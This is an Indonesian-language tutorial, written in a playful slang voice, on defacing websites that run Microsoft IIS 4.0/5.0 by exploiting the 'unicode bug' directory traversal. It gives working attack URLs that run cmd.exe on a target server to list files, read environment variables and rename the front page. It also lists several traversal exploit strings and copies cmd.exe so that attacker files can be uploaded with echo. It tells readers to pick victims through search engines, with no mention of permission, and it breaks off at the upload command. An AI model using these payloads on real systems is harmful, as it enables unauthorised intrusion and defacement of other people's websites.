Melalui
tutor ini saya teh hanya ingin berbagi pengalaman mengenai cara men-deface
website yang menggunakan Microsoft Internet Information Server atau Microsoft
IIS. Harap DeFaceR (sebutan bagi org yg suka deface..;p) ketahui...Microsoft
Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang
dinamakan "unicode bug". Sayah tidak akan menjelaskan panjang lebar
mengenai "unicode bug" ini karena sayah takut salah menjelaskan
(ssSSTTtHHH!! jgn bilang sapa2 yah sebenernyah sayah teh emang gak tau
...ehehehheehhe..;p~). Yang jelas dengan bug ini kita bisa mengeksplorasi
komputer target dengan hanya menggunakan internet browser.
OK...mari
kita mulai...Pertama kita cari site site target terlebih dahulu di search
engine (google,yahoo,dll)...key nya terserah kowe.....Lalu utk mengetahui site
itu menggunakan MS IIS 4.0/5.0...Kita scan terlebih dahulu di
www.netcraft.com......dapat site nyah..??...Okeh..setelah kita mendapatkan site
yg menggunakan MS IIS 4.0/5.0 ...Langkah selanjutnya utk mengetahui site
tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc
(utk mengeteahui cara scan lewat mirc....coba koe buka
http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode Dengan
MIRC),bisa juga memakai sopwer yg bisa and DL di http://accessftp.topcities.com/....or
memakai cara manual yg lebih sering sayah gunakan ehehhehehhee...contoh:
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
Ada
dua kemungkinan yang tampil pada browser Anda yaitu:
Kahiji
: Muncul pesan ERROR ...
Kaduana
: Muncul daftar file-file dari drive C pada komputer server target. Bila ini
terjadi maka www.targethost.com tadi ada kemungkinan untuk bisa kita deface...
Mari
kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL diatas menjadi
empat bagian yaitu :
·
Bagian host, yaitu "http://www.targethost.com"
·
Bagian exploit string, yaitu "/scripts/..%255c..%255c"
·
Bagian folder, yaitu "/winnt/system32/"
·
Bagian command, yaitu "cmd.exe?/c+dir+c:\"
Kita
lihat pada bagian command diatas menunjukkan perintah "dir c:\" yang
berarti melihat seluruh file-file yang berada pada root drive C. Koe bisa
mencoba perintah yang lain seperti "dir d:\" atau yang lain. Ingat,
Koe harus mengganti karakter spasi dengan tanda "+". Koe bahkan bisa
mengetahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah
"ipconfig.exe /all"
Selain
itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error
pada browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah,
eksploit string yg sering tembus adalah :
-
/cgi-bin/..%255c..%255c
-
/msadc/..%e0\%80\%af../..\%e0\%80\%aff../..\%e0\%80\%af..
-
/cgi-bin/..%c0%af..%c0%af..%c0%af..%cc0%af..%c0%af..
-
/samples/..%c0%af..%c0%af..%c0%af..%cc0%af..%c0%af..
-
/iisadmpwd/..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..
-
/_vti_cnf/..%c0%af..%c0%af..%c0%af..%%c0%af..%c0%af..
-
/_vti_bin/..%c0%af..%c0%af..%c0%af..%%c0%af..%c0%af..
-
/adsamples/..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..
-
/scripts/..%255c..%255c
Jika
semua pilihan eksploit string diatas masih memunculkan pesan error pada browser
koe maka kemungkinan besar IIS pada web server sudah di-patch bug unicode nya
(OR IE kowe yg lagie dodolss...hiheiehiehiehei). Dan koe bisa memilih situs
lain sebagai sasaran....(yg sabar yah nak nyari targetnyah...ehehhehehe).
Lanjuttt......udeh
dapet site yg bug unicodenyah gak di patch..??....Langkah berikutnya adalah
mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,,index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada
juga yg pake .php/php3/shtml. Folder ini dinamakan web root. Biasanya web root
berada di C:\InetPub\wwwroot\ atau D:\InetPub\wwwroot. Tapi terkadang web
administrator menggantinya dengan yang lain. Untuk mengetahuinya koe cukup
mengetikkan URL seperti di bawah ini
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set
URL
diatas akan menampilkan daftar environment variable dari web server sasaran.
Kebuka..??...Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau tulisan
PATH_TRANSLATEDnyah...gak ada yahh..??...coba deh koe ripresh lagehh...udah
ketemuuu...nah skrg kita DIR deh tuh si PATH_TRANSLATEDnyah.....Kita ambil
contoh PATH_TRANSLATEDnyah : C:\InetPub\wwwroot....Perintahnya ng-DIR nyah :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
Huaaaaaaa....isinyah
banyak banged yahh.....mana dokumen2 web yg kita curigain itu ada 3 bijih
lagehh....hemm santeyy...oiyahh...lupa sayah...Tugas kita setelah ng-DIR
PATH_TRANSLATEDnyah.....truss kita cari dokumen web itu disitu utk kita
RENAME....gemana kalo misalnyah dokumen2 web yg kita curigain itu ada
3.….santeyy...coba skrg koe buka site aslinyah di laen window.... http://www.targethost.com
== neh yg ini......di situ kan alias di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di
RENAME....misalnya : di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
itu ada :
Directory
of C:\InetPub\wwwroot
07/20/01
03:21p 1,590 default.htm
07/20/01
03:21p 590 index.html
07/20/01
03:21p 3,453 main.html
Udah
di buka kan site aslinyah...nah coba masukin salah satu dokumen web itu di site
asli nyah...contoh : http://www.targethost.com/default.htm…kita liad hasilnya
apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web
tadee….waww…ternyata tidak sama…hemm….coba masukin lageh salah satu dokumen web
itu site aslinyah….mMmm..kita masukin yg main.html….waww…waww…..ternyata sama
gambarnyahh….Nah skrg kita RENAME deh yg main.html ituu….perintahnya :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:\InetPub\wwwroot\main.html+gue.html
Lihat
apa yg terjadi di IE kitaa…
CGI
Error
The
specified CGI application misbehaved by not returning a complete set of HTTP
headers. The headers it did return are:
Access
is denied
Yahhhh…..akses
dineyy….hiekksss…jgn nyerah bro`…kita carih lageh targetnyah okeHh !!!…Dapat
targetnyah..??…udah di RENAME nyah…??….Hasilnya setelah di RENAME seperti di
bawah ini bukan…??
CGI
Error
The
specified CGI application misbehaved by not returning a complete set of HTTP
headers. The headers it did return are :
Kalo
iyahh….waaa…selamat anda telah merubah or berhasil men-deface halaman depan web
site tersebut….kalo gak caya…buka ajah site aslinyah…pasti ERROR
kann…ehehhehehhee…(Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg
kita rename tadi di notepad utk langkah selanjutnyah*)
Sekarang
koe tugasnyah meng-upload file koe ke site tadee…Ada dua cara my bro`…Pertama
lewat ECHO..Kedua lewat TFTP32….
*Cara
pertama :*
Utk
meng-upload file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada
direktori C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan
nama lain, misalnya cmdku.exe. Untuk meng-copy cmd.exe menjadi cmdku.exe pada
folder winnt\system32 maka cukup ketik URL berikut :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\cmdku.exe
Pasti
hasilnya akan seperti di bawah ini :
CGI
Error
The
specified CGI application misbehaved by not returning a complete set of HTTP
headers. The headers it did return are :
1
file(s) copied.
Tujuan
kita meng-copy cmd.exe menjadi cmdku.exe adalah agar kita bisa menjalankan
perintah echo dengan lengkap. Apabila Anda menggunakan cmd.exe maka perintah
echo tidak bisa digunakan untuk menulis atau membuat file.
Okeih
beBb…skrg mari kita up-load file nya lewat perintah echo…perintahnya :
http://www.targethost.com/scripts/..%255c..%255ccmdku.exe?/c+echo+"